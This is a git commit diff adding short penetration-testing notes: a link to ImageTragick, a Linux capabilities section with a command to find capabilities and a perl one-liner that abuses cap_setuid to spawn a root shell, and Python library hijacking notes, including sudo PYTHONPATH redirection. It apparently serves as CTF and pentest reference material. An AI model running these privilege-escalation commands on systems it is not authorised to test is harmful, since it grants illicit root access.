stuff
This commit is contained in:
parent
b65298a98c
commit
d9243ba0b6
|
@ -0,0 +1,3 @@
|
||||||
|
# ImageTragick
|
||||||
|
|
||||||
|
* [ImageTragick Website](https://imagetragick.com)
|
|
@ -3,6 +3,12 @@
|
||||||
* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
|
* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities)
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
|
* Find capabilities
|
||||||
```sh
|
```sh
|
||||||
getcap -r / 2>/dev/null
|
getcap -r / 2>/dev/null
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* `cap_setuid` through `/bin/perl`
|
||||||
|
```sh
|
||||||
|
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
# Library Hijacking
|
||||||
|
|
||||||
|
* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8)
|
||||||
|
|
||||||
|
## Interpreter might be called invoking sudo
|
||||||
|
* Write into a library called inside the script
|
||||||
|
|
||||||
|
## Path call order of packages
|
||||||
|
* Order of paths which are invoked to find packages may be found via
|
||||||
|
```sh
|
||||||
|
python -c 'import sys; print("\n".join(sys.path))'
|
||||||
|
```
|
||||||
|
* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script.
|
||||||
|
* The highest order is `pwd`
|
||||||
|
|
||||||
|
## Redirecting PYTHONPATH
|
||||||
|
* `SETENV` may be set while loading script through `sudo`
|
||||||
|
```sh
|
||||||
|
sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 <script.py>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue